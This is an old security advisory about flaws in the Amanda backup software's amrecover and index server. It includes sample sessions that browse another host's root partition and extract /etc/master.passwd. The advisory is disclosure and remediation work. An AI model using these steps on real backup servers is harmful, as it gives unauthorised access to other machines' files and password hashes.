COMMAND

    Amanda

SYSTEMS AFFECTED

    Systems running Amanda backup software (2.3.0.x, 2.4.0beta)

PROBLEM

    Following info is based on CPIO Security Notice (issue number 11).
    There are serveral security problems in the current version of
    Amanda.

        1. Any  attacker  can  remotely  connect  to  an index  server
           allowing that person to access any machine being backed up.
        2. Any attacker with local access to a machine being backed up
           has access to  any machine being  backed up or  any partion
           being backed up via Amanda.

    In example 1 the players are:

        index.servername.net | the affected index server
        remote.attacker.org  | attackers computer
        staff                | a machine being backed up by the index server

        [remote%] amrecover -s index.servername.net
        AMRECOVER Version 1.0. Contacting server on index.servername.net ...
        220 index.servername.net AMANDA index server (1.0) ready.
        Setting restore date to today (1997-12-24)
        200 Working date set to 1997-12-24.
        200 Config set to DailySet1.
        501 No index records for host: remote.attacker.org. Invalid?
        amrecover> sethost staff
        200 Dump host set to staff.
        amrecover> setdisk wd0a
        200 Disk set to wd0a
        amrecover> ls
        [ list of root partion ]

    In example 2 the players are:

        users                | users shell machine being backed up
        staff                | staff machine being backed up

        [users%] amrecover
        AMRECOVER Version 1.0. Contacting server on index.servername.net ...
        220 index.servername.net AMANDA index server (1.0) ready.
        Setting restore date to today (1997-12-24)
        200 Working date set to 1997-12-24.
        200 Config set to DailySet1.
        200 Dump host set to users.
        Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
        200 Disk set to wd0f.
        amrecover> setdisk wd0a
        200 Disk set to wd0a
        amrecover> cd etc
        amrecover> add master.passwd
        Added /etc/master.passwd
        amrecover> extract
        Extracting files using tape drive /dev/nrst0 on host index.servername.net.
        The following tapes are needed: DAILY6
        Restoring files into directory /home/home1/joey
        Continue? [Y/n]: y
        Load tape DAILY6 now
        Continue? [Y/n]: y
        amrecover> quit
        [local%] pwd
        /home/home1/joey
        [local%] ls master.passwd
        master.passwd

    This vulnerability was discovered and described by Joey Novell.
SOLUTION

    Amanda 2.4.0b5  fixes the  amrecover problem  and other  potential
    security holes, and is the  product of a security audit  conducted
    in  conjunction  with  the  OpenBSD  effort.   The  new version is
    available at:

        ftp://ftp.amanda.org/pub/amanda/amanda-2.4.0b5.tar.gz

    Amanda 2.3.0  and earlier  UMD releases  are not  affected by this
    particular  bug,  as  amrecover  was  not  part of those releases.
    However, earlier releases do have potential security problems  and
    other bugs,  so the  Amanda Team  recommends upgrading  to the new
    release as soon as practicable.  At an active site running  Amanda
    2.3.0.x or 2.4.0 beta, amrecover/amindexd can be disabled by:

        - removing amandaidx and amidxtape from /etc/inetd.conf
        - restarting inetd.conf (kill -HUP should do)